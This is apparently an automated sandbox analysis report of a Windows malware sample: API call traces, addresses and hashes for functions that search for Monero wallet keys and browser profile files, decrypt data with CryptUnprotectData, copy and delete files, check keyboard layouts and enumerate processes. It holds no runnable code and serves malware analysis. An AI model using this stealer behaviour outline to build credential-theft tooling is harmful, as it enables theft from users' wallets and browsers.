                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C615B8,00C60D96), ref: 00C4F71E
                        • StrCmpCA.SHLWAPI(?,00C615BC), ref: 00C4F76F
                        • StrCmpCA.SHLWAPI(?,00C615C0), ref: 00C4F785
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00C4FAB1
                        • FindClose.KERNEL32(000000FF), ref: 00C4FAC3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: prefs.js
                        • API String ID: 3334442632-3783873740
                        • Opcode ID: 70665d61447e91276916df33c1594f4a4cf20021662f0320306a74525eec0815
                        • Instruction ID: 169ae72c4387ed430f6fecf498d80c7a9a88bb742d752489fcd036c8c0102511
                        • Opcode Fuzzy Hash: 70665d61447e91276916df33c1594f4a4cf20021662f0320306a74525eec0815
                        • Instruction Fuzzy Hash: A4B163759001189BDB24FF61DC95BEE7378BF54301F4082A9E80A96181EF306B8EDF96
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C6510C,?,?,?,00C651B4,?,?,00000000,?,00000000), ref: 00C41923
                        • StrCmpCA.SHLWAPI(?,00C6525C), ref: 00C41973
                        • StrCmpCA.SHLWAPI(?,00C65304), ref: 00C41989
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C41D40
                        • DeleteFileA.KERNEL32(00000000), ref: 00C41DCA
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00C41E20
                        • FindClose.KERNEL32(000000FF), ref: 00C41E32
                          • Part of subcall function 00C5A920: lstrcpy.KERNEL32(00000000,?), ref: 00C5A972
                          • Part of subcall function 00C5A920: lstrcat.KERNEL32(00000000), ref: 00C5A982
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 1415058207-1173974218
                        • Opcode ID: 070707b981c1b4d1a07fc9995994c0baa3a04695f29645f8170002953afc82a7
                        • Instruction ID: 06d323c4421427a605d658eb60cfc64e760aa4fceb1e4a85b64c5db75efcd5b5
                        • Opcode Fuzzy Hash: 070707b981c1b4d1a07fc9995994c0baa3a04695f29645f8170002953afc82a7
                        • Instruction Fuzzy Hash: 7A12EE759101189BDB25FB62CC96AEE7378BF54301F4042A9B90A62091EF306FCDDFA5
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00C60C2E), ref: 00C4DE5E
                        • StrCmpCA.SHLWAPI(?,00C614C8), ref: 00C4DEAE
                        • StrCmpCA.SHLWAPI(?,00C614CC), ref: 00C4DEC4
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00C4E3E0
                        • FindClose.KERNEL32(000000FF), ref: 00C4E3F2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                        • String ID: \*.*
                        • API String ID: 2325840235-1173974218
                        • Opcode ID: b432059858c1dd255c97bb1f1cac63c81e07ad11b8b0de6e5d9230aaacd392d3
                        • Instruction ID: 919200f600704f33dede4ac2783a45f8b79a8b83ecc4387aa70fbf1638db3254
                        • Opcode Fuzzy Hash: b432059858c1dd255c97bb1f1cac63c81e07ad11b8b0de6e5d9230aaacd392d3
                        • Instruction Fuzzy Hash: C9F19F758141189ADB25FB62DC95EEE7338BF14301F8442E9A81A62091EF306FCEDF56
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C5A920: lstrcpy.KERNEL32(00000000,?), ref: 00C5A972
                          • Part of subcall function 00C5A920: lstrcat.KERNEL32(00000000), ref: 00C5A982
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C614B0,00C60C2A), ref: 00C4DAEB
                        • StrCmpCA.SHLWAPI(?,00C614B4), ref: 00C4DB33
                        • StrCmpCA.SHLWAPI(?,00C614B8), ref: 00C4DB49
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00C4DDCC
                        • FindClose.KERNEL32(000000FF), ref: 00C4DDDE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID:
                        • API String ID: 3334442632-0
                        • Opcode ID: 3adf15aa9f35151e60dbbe8ab92e876f793f32f0dd7b99c6ebb99a728b88045f
                        • Instruction ID: ce507c0fd43272cfa2215828a6e3db2a38542a76fad21c038d7cfc6d3e22ae6d
                        • Opcode Fuzzy Hash: 3adf15aa9f35151e60dbbe8ab92e876f793f32f0dd7b99c6ebb99a728b88045f
                        • Instruction Fuzzy Hash: 289185769001049BCB14FB71EC96AED773CBB88301F448669FD0A96181EE349B4DDBA6
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                        • GetKeyboardLayoutList.USER32(00000000,00000000,00C605AF), ref: 00C57BE1
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00C57BF9
                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 00C57C0D
                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00C57C62
                        • LocalFree.KERNEL32(00000000), ref: 00C57D22
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                        • String ID: /
                        • API String ID: 3090951853-4001269591
                        • Opcode ID: bfd25b7b28e461e7f971b66be3f4515e6568333d23fdbdcc8f7f95199b88a153
                        • Instruction ID: 58c0082e0810cb5e26e3bc47ea68eea8c77c9dee5c1241ed9a7162d5408935e8
                        • Opcode Fuzzy Hash: bfd25b7b28e461e7f971b66be3f4515e6568333d23fdbdcc8f7f95199b88a153
                        • Instruction Fuzzy Hash: 7C416D75940218ABDB24DB95DC89BEEB378FF44701F2042D9E80A62180DB342FC9DFA5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: +y$7n}v$;9S_$o?$u_k${;${;
                        • API String ID: 0-97793633
                        • Opcode ID: 09679e3f9284cae7a7339bc2ab33f2e20e921577fba10de7c22a41596d08e8a4
                        • Instruction ID: 336c2b7b644b78cae82c17c190334fa242dcb34b2a43e6aabfa157a9dd270d87
                        • Opcode Fuzzy Hash: 09679e3f9284cae7a7339bc2ab33f2e20e921577fba10de7c22a41596d08e8a4
                        • Instruction Fuzzy Hash: E2B205F3A082049FE704AE2DEC8567AFBE5EF94720F1A492DE6C4C3744E63558058797
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C5A920: lstrcpy.KERNEL32(00000000,?), ref: 00C5A972
                          • Part of subcall function 00C5A920: lstrcat.KERNEL32(00000000), ref: 00C5A982
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00C60D73), ref: 00C4E4A2
                        • StrCmpCA.SHLWAPI(?,00C614F8), ref: 00C4E4F2
                        • StrCmpCA.SHLWAPI(?,00C614FC), ref: 00C4E508
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00C4EBDF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 433455689-1173974218
                        • Opcode ID: f260e38da87f5681e92c9e529911a35a8374dc8a0050add15e3be7bae2ce01a7
                        • Instruction ID: e95fd0cc15e25332236077ba4f7b9536ecefd2f039a4cc58118d8d930a9773da
                        • Opcode Fuzzy Hash: f260e38da87f5681e92c9e529911a35a8374dc8a0050add15e3be7bae2ce01a7
                        • Instruction Fuzzy Hash: D6123F759101189ADB14FB62DC96EED7338BF54301F4042A9B90AA6091FF306F8DDFA6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 5Fc_$GtgW$Si_~$Xce$Z?$rJ+}
                        • API String ID: 0-2440060258
                        • Opcode ID: 13f24f0b4ea3ec427916652085b2d98d53d3bd9dfbdc16e1c9127b806f86cac0
                        • Instruction ID: da5eeb75e04606ff97e2e1691464ca5e3fecf13a60fa61fa45413d917ca1c3da
                        • Opcode Fuzzy Hash: 13f24f0b4ea3ec427916652085b2d98d53d3bd9dfbdc16e1c9127b806f86cac0
                        • Instruction Fuzzy Hash: 33B217F36082049FE704AE2DEC8577AF7E9EF94320F1A853DE6C4C7744EA3598058696
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Dgo$JD{$VR]$i3:O${r5$[E
                        • API String ID: 0-1220943483
                        • Opcode ID: 98780f1f767700533aed8301b644b8ff477a6aa0e3d1f402ff16c3223541ae1a
                        • Instruction ID: 3cbf1e5a4ad0dab0daf952b78566a4042f5a25dc992f765624ce48bda7ea3411
                        • Opcode Fuzzy Hash: 98780f1f767700533aed8301b644b8ff477a6aa0e3d1f402ff16c3223541ae1a
                        • Instruction Fuzzy Hash: A9B228F3A0C2109FE3046E2DEC8567ABBE9EF94720F1A493DEAC4C3344E67558058796
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 6a_X$8rh$]^i$sV~W$t+jo$F7N
                        • API String ID: 0-2849425773
                        • Opcode ID: eed917dec397d9518e4703ff4021f20271f67ea3936c8942c21ae17a8f344fc4
                        • Instruction ID: 70f520e032c3f825dd988beb8db9e6ca15c3ca8a8eff9c3d870431d73dc5b981
                        • Opcode Fuzzy Hash: eed917dec397d9518e4703ff4021f20271f67ea3936c8942c21ae17a8f344fc4
                        • Instruction Fuzzy Hash: ECA216F360C2049FE3046E29EC8567ABBE9EF94720F1A493DE6C5C3344EA3598458797
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: "8r$(+c<$(+c<$OS}$f~:}
                        • API String ID: 0-1059734795
                        • Opcode ID: e11eddea951735a65598c03931c82d601464addfe491b18323b00ffbf7f3fa48
                        • Instruction ID: 586dbeb0c03ffabaa83ef3320424ae6b07615b9bde971b30a2b25200bf592072
                        • Opcode Fuzzy Hash: e11eddea951735a65598c03931c82d601464addfe491b18323b00ffbf7f3fa48
                        • Instruction Fuzzy Hash: 1FB25CF3A0C2049FE3046E2DEC8567AB7E9EFD4720F1A863DEAC5C3744E93558058696
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: !SW}$R$Og$U{gG$U{gG$apy
                        • API String ID: 0-401539328
                        • Opcode ID: 13acd1692b4b92004f85b962fa0bf32a680de47f9e1d10518062bbce5178b6c1
                        • Instruction ID: ce8a8814d34c9aef90dbedee32dccb50b15ce3c4831ea753775aed073b119f60
                        • Opcode Fuzzy Hash: 13acd1692b4b92004f85b962fa0bf32a680de47f9e1d10518062bbce5178b6c1
                        • Instruction Fuzzy Hash: 51B2F6F36082049FE3046F2DEC8567AFBE9EF94720F1A493DEAC583744EA7558018697
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 3A|]$R8bm$_Pu $sd~$W}}
                        • API String ID: 0-291602057
                        • Opcode ID: e767e7e7c427506f625d4ecc83b978b03f73979e1b3e0b5d6e147024f515d7e8
                        • Instruction ID: a5bcb3b4d02e9749debbc487c9c432b8a949c923ade9b68244c27368f6406711
                        • Opcode Fuzzy Hash: e767e7e7c427506f625d4ecc83b978b03f73979e1b3e0b5d6e147024f515d7e8
                        • Instruction Fuzzy Hash: 80B2F5F360C2009FE308AE29EC8567ABBE9EF94320F1A853DE6C5C7744E67558418697
                        APIs
                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00C4C871
                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00C4C87C
                        • lstrcat.KERNEL32(?,00C60B46), ref: 00C4C943
                        • lstrcat.KERNEL32(?,00C60B47), ref: 00C4C957
                        • lstrcat.KERNEL32(?,00C60B4E), ref: 00C4C978
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$BinaryCryptStringlstrlen
                        • String ID:
                        • API String ID: 189259977-0
                        • Opcode ID: 0735f0773497aabe0c3606542533d20d7efc4802592f0d81ea42889351dc779b
                        • Instruction ID: f61c97ba8afba0cefd2c7ebc12a9643b3e587c9c37e8584602f132622561648e
                        • Opcode Fuzzy Hash: 0735f0773497aabe0c3606542533d20d7efc4802592f0d81ea42889351dc779b
                        • Instruction Fuzzy Hash: 32415DB590421AEFDB10DF90DD89BFEB7B8BB48304F1441B9E509B6280D7745A84CF92
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00C4724D
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C47254
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00C47281
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00C472A4
                        • LocalFree.KERNEL32(?), ref: 00C472AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                        • String ID:
                        • API String ID: 2609814428-0
                        • Opcode ID: 160acb60e10fc356e160e7625d32fcdb630ca4152b96bf54c09f67e33e501fd3
                        • Instruction ID: 69a3b71038bb173fd9bffe33a6723dc3d0367cc802e4843df37d9aae5a771db0
                        • Opcode Fuzzy Hash: 160acb60e10fc356e160e7625d32fcdb630ca4152b96bf54c09f67e33e501fd3
                        • Instruction Fuzzy Hash: 6E010CB5A40208BFEB24DFD5DD4AF9E77B8AB44B00F144555FB09BA2C0D6B0AA048B65
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C5961E
                        • Process32First.KERNEL32(00C60ACA,00000128), ref: 00C59632
                        • Process32Next.KERNEL32(00C60ACA,00000128), ref: 00C59647
                        • StrCmpCA.SHLWAPI(?,00000000), ref: 00C5965C
                        • CloseHandle.KERNEL32(00C60ACA), ref: 00C5967A
                        Memory Dump Source
